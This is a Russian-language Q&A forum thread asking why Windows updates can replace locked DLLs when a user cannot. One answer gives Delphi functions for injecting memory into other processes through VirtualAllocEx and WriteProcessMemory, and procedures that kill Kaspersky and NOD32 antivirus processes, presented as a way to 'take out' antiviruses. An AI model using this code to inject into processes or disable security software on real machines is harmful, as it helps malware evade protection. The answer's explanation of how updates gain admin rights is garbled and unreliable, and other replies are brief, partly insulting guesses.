почему обновления майкрософта могут заменить заблокированную dll прямо в винде, а юзер нет?

В целях зашиты майкрософт чтобы как то вести и следить за происходящими процесами оставила немного лазеек. Одной из такой лазеек является вторжение динамической библиотеки иного процесса в другой процесс, также когда в виндухе имеется внутренния библиотека к которой обращается обновление и получает моментально админовские права в дереве системных служб без перегрузки компьютера, с такими правами можно делать все что угодно!!! !
Вот на примере несколько функций на делфи которые внедряются в другие просессы и выполняют свои функции:
----------------------------------------------------------------------------
{ Внедрение null terminated строки в процесс }
----------------------------------------------------------------------------
function InjectString(Process: dword; Text: PChar): PChar;
var
BytesWritten: dword;
begin
Result := VirtualAllocEx(Process, nil, Length(Text) + 1,
MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(Process, Result, Text, Length(Text) + 1, BytesWritten);
end;
---------------------------------------------------------------------
{ Внедрение участка памяти в процесс }
---------------------------------------------------------------------
function InjectMemory(Process: dword; Memory: pointer; Size: dword): pointer;
var
BytesWritten: dword;
begin
Result := VirtualAllocEx(Process, nil, Size, MEM_COMMIT or MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
WriteProcessMemory(Process, Result, Memory, Size, BytesWritten);
end;
Внедря свою ддл в системный процесс получаем прова администратора на баханье системных процессов и дерев процесса, теперь несложно бахнуть и антивирусы, например вот так
----------------------удаляем каспера с процессов ------------------
procedure TForm1.KillKAV;
begin
DebugKillProcess(GetProcessId('kav. exe'));
end;
-----------------нод 32 -----------------------
procedure TForm1.KillNOD32;
begin
// сервис Nod32 - 'Nod32krn.exe' %Prograndir%\Eset\Nod32krn.exe
DebugKillProcess(GetProcessId('Nod3 2krn.exe'));
end;
Одним словом я думаю понятно каким способом обновления получает права админа в системном дере процесса и без перезагрузки творит что хотит.

Потому что обновления, точнее программа управления ими, работает в более низшем кольце (ring) и имеет намного больше прав, т. к. частично связана с ядром ОС. За пояснениями - в гугл.

Они знают куда и как надо лезть, а ты нет

Потому что они крутый, а юзер лох.

стоит защита в виндовс, которая работает только при включенной операционной системы. попробуй заменить файл вне операционной системы. я уверен, что получиться